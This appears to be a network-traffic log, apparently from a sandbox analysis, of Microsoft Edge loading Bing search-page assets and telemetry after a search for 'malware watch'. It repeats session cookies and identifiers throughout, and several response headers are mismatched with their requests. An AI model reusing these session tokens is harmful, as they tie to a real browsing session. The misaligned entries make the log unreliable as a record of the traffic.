accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
ResponseHTTP/2.0 200
etag: 0x8DCDC5DC0B634E9
cache-control: public, no-transform, max-age=420953
expires: Mon, 03 Feb 2025 07:36:21 GMT
akamai-grn: 0.a6777b5c.1738147228.624a118
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-amd-bc-debug: [a=92.123.132.81,b=288786312,c=c,d=1734886704,h=304,k=1,l=0,n=GB_EN_LONDON,o=20940,r=1]
content-length: 10060
content-type: image/png
content-md5: NyL0K09FbOsKFVWkE+stgw==
x-ms-request-id: 1c73811e-401e-0059-11b5-19ef16000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0ef5c
-
Remote address:88.221.135.16:443RequestGET /sa/simg/Roboto_Regular.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0f150
-
Remote address:88.221.135.16:443RequestGET /sa/simg/Roboto_Semibold.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 200
last-modified: Tue, 24 Sep 2024 06:53:27 GMT
etag: 0x8DCDC6597B401F0
cache-control: public, no-transform, max-age=394094
akamai-grn: 0.4eba1302.1738053377.156df816
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 9310
content-type: image/png
content-md5: GUexVzkiHrDbJxwd2PleRg==
x-ms-request-id: 490b4d38-e01e-005f-1926-15186e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0f17c
-
Remote address:88.221.135.16:443RequestGET /rp/B6jGHby7hXuEC7enS8xiNSUwqXw.png HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 200
content-type: image/x-icon
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
x-eventid: 6672dcd073a742838654c3093e6e7562
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0f226
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.HeaderScopeOrder%22,%22FID%22:%22CI%22,%22Name%22:%22ScopeMapOrderValue%22,%22Text%22:%220%3A0%2C1%3A1%2C6%3A2%2C2%3A3%2C3%3A4%2C4%3A5%2C5%3A6%22}]msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.HeaderScopeOrder%22,%22FID%22:%22CI%22,%22Name%22:%22ScopeMapOrderValue%22,%22Text%22:%220%3A0%2C1%3A1%2C6%3A2%2C2%3A3%2C3%3A4%2C4%3A5%2C5%3A6%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: X5FwKZl0Iv4L7zVuNvC91g==
last-modified: Wed, 29 Jan 2025 03:57:30 GMT
etag: 0x8DD40190D80FEDE
x-ms-request-id: de4f8ed0-601e-006c-153c-724143000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.b46c645f.1738147997.270fdaf3
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
akamai-grn: 0.e7c71002.1738148044.fc41cd3
cache-control: public, no-transform, max-age=431503
expires: Mon, 03 Feb 2025 10:52:51 GMT
akamai-grn: 0.e4c71002.1738148468.29e6909
timing-allow-origin: *
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0f227
-
Remote address:88.221.135.16:443RequestGET /rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 204
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0f20b
-
Remote address:88.221.135.16:443RequestPOST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 382
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 200
access-control-allow-origin: *
date: Thu, 30 Jan 2025 22:03:47 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274627.1ad0f225
-
GEThttps://www.bing.com/fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:14,%22BC%22:318,%22SE%22:-1,%22TC%22:-1,%22H%22:378,%22BP%22:412,%22CT%22:417,%22IL%22:3},%22ad%22:[-1,-1,1263,609,1263,2918,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01msedge.exeRemote address:88.221.135.16:443RequestGET /fd/ls/l?IG=69579D85EA2D4E95B5358DAB8D3A2EA2&CID=2B1BFC6B1DFE63020FDCE9EF1C62624D&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:14,%22BC%22:318,%22SE%22:-1,%22TC%22:-1,%22H%22:378,%22BP%22:412,%22CT%22:417,%22IL%22:3},%22ad%22:[-1,-1,1263,609,1263,2918,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=malware+watch&cvid=0e73f29b17ee4b719f03106da34802ca&aqs=edge..69i57j0l6.1385j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ak_bmsc=36919174BCEB2C1969D3ADC2940FB93D~000000000000000000000000000000~YAAQMjZ6XBxEd5OUAQAAfs89uRoTbVP56O6YAnbh6429jnaFf2b2t5pk5DDjonSc/sY2rwzMCZYb83oWj2T55anMb2Ng0NJVU5HS0Dsh80ohCJnD7tBBSh1r4WJjKkms/rsti6QCaZ8nRKLtH3KZkQK+8IX9ish50O12G9/SnCOyev4cxjNdmjO0RPxBzCWJbxgz93wcjM1zeTWBCKRFjUeRpwnHPR8E5AiW6cP52GNFLH9pjXGVaWF7UiXcUJL1EEUzNiMDPXBBitILp65+4Xq6SjeV5sLVxsFxGHuseCvjpEXQN8aQDrhJuUGNGU/SqO5OGbBHiXcBFvXnIzsGxsCIThG96ArxmTXqDrmIaFeN0/4F9YB9naqiqe80JRNfVAfUN6Su8p+i
cookie: MUID=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: MUIDB=2B1BFC6B1DFE63020FDCE9EF1C62624D
cookie: _EDGE_S=F=1&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=05DFC6CDCE37668C2381D349CFAB67A5
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=B572832A81B54D2484A18E26A0E9EAD7&dmnchg=1
cookie: SRCHUSR=DOB=20250130
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: bm_sv=BA2C011CC84F794D64B638ABD94B04AE~YAAQMjZ6XChFd5OUAQAAI989uRp27uVDwDEWs7ccxGdwFgQbqAqBFduxjzrsIah2lgrS2+e5RYmPS2FWltvv9QsAunj5PawZK/JTwp76h5kGnemVo8xIbfmktU9+2ojyIUcaho2D3zkqJzs4lrSDDX0JwklKbR6eHwEb9DrLbi483wi3NGottLXsD/8bU4G+mG5f/uS1dKobC0IUkFNoQ80mOWi4BfDGS7geido1g3UAn/J7YIasFx7XfVPPRw==~1
ResponseHTTP/2.0 200
etag: 0x8DCDC646C9AF5F4
cache-control: public, no-transform, max-age=393079
expires: Sun, 02 Feb 2025 13:06:56 GMT
akamai-grn: 0.94777b5c.1738108537.56b637b
timing-allow-origin: *
content-length: 1929
content-type: image/png
content-md5: TBVfy13T2kZEUa0kC23mBg==
x-ms-request-id: 1d60634c-401e-0052-2736-1bf762000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.32367a5c.1738274628.1ad0f2f4
-
Remote address:88.221.135.16:443RequestGET /sa/simg/favicon-trans-bg-blue-mg.ico HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
